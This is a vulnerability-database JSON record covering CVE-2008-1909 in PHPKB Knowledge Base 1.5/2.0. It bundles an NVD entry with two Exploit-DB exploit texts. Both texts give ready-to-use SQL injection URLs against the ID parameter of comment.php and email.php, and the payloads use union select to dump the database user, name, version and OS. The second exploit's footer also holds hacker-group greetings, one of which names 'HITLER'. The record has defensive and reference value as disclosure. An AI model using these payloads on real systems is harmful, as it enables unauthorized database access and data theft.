{"published": "2008-04-11T00:00:00", "id": "EDB-ID:5428", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hash": "69634848ee76a72d3ab7dd4410e31a52c7bf78e112cb07cccb76c22b730e5491", "description": "PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability. CVE-2008-1909. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/5428/", "lastseen": "2016-01-31T23:06:32", "edition": 1, "title": "PHPKB 1.5 Knowledge Base ID SQL Injection Vulnerability", "osvdbidlist": ["44344"], "modified": "2008-04-11T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1909"], "sourceHref": "https://www.exploit-db.com/download/5428/", "references": [], "reporter": "parad0x", "sourceData": "PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability\n-------------------------------------------------------------------------------------------------\n# Author : parad0x\n# Home : www.inso.host.sk\n# Script : PHPKB Knowledge Base Software \n# Script Homepage : http://www.knowledgebase-script.com\n -------------------------------------------------------------------------------------------------\nhttp://[target]/comment.php?ID=[SQL]\n\n-------------------------------------------------------------------------------------------------\nExample:\n\nhttp://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*\n-------------------------------------------------------------------------------------------------\ngreetz : VoLqaN\n-------------------------------------------------------------------------------------------------\n\n# milw0rm.com [2008-04-11]\n", "objectVersion": "1.0"}

{"cve": [{"lastseen": "2017-09-29T14:25:51", "references": ["https://www.exploit-db.com/exploits/5428", "https://exchange.xforce.ibmcloud.com/vulnerabilities/41769", "http://www.securityfocus.com/bid/28739"], "description": "SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.", "edition": 3, "reporter": "NVD", "published": "2008-04-22T00:41:00", "title": "CVE-2008-1909", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:51", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-1909"], "scanner": [], "modified": "2017-09-28T21:30:55", "cpe": ["cpe:/a:chadha_software_technologies:phpkb_knowledge_base:2.0", "cpe:/a:chadha_software_technologies:phpkb_knowledge_base:1.5"], "id": "CVE-2008-1909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1909", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T16:47:41", "osvdbidlist": ["44344", "49876"], "references": [], "description": "PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities. CVE-2008-1909,CVE-2008-5088. Webapps exploit for php platform", "edition": 1, "reporter": "R3d-D3V!L", "published": "2010-05-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5088", "CVE-2008-1909"], "modified": "2010-05-10T00:00:00", "id": "EDB-ID:12561", "href": "https://www.exploit-db.com/exploits/12561/", "sourceData": "[+] {In The Name Of Allah The Mercifull}\r\n[+]\r\n[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities\r\n[~] Vendor: www.knowledgebase-script.com\r\n[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support\r\n[-]\r\n[+] author: ((R3d-D3v!L))\r\n[~]\r\n\r\n[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))\r\n[~]\r\n\r\n[?] contact: X[at]hotmail.co.jp\r\n[-]\r\n[?] Date: 3.Jan.2010\r\n[?] T!ME: 04:15 am GMT\r\n[?] Home: \u00a9 Offensive Security\r\n[?]\r\n[?]\r\n[-]{DEV!L'5 of SYST3M}\r\n\r\n======================================================================================\r\n# SQL Injection #1 - email.php ID\r\n======================================================================================\r\n[*] Err0r C0N50L3:\r\nhttp://127.0.0.1/email.php?ID={EV!L EXPLO!T}\r\n\r\n[*]{EV!L EXPLO!T}\r\n1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*\r\n\r\n======================================================================================\r\n# SQL Injection #2 - comment.php ID\r\n======================================================================================\r\n[*] Err0r C0N50L3:\r\nhttp://127.0.0.1/comment.php?ID=EV!L EXPLO!T\r\n\r\n[*]{EV!L EXPLO!T}\r\n-1+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*\r\n\r\n\r\n\r\nN073:\r\n\r\nREAL RED DEV!L W@S h3r3 LAMERZ\r\n\r\nGAZA !N our hearts !\r\n\r\n\r\n[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------#\r\n#\r\n[~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #\r\n#\r\n[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #\r\n#\r\n[~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) #\r\n#\r\n[?]spechial SupP0RT : MY M!ND # \u00a9 Offensive Security #\r\n#\r\n[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) #\r\n#\r\n[~]spechial FR!ND: 0r45hy #\r\n#\r\n[~] !'M 4R48!4N 3XPL0!73R. #\r\n#\r\n[~]{[(D!R 4ll 0R D!E)]}; #\r\n#\r\n[~]--------------------------------------------------------------------------------------------- #\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/12561/"}]}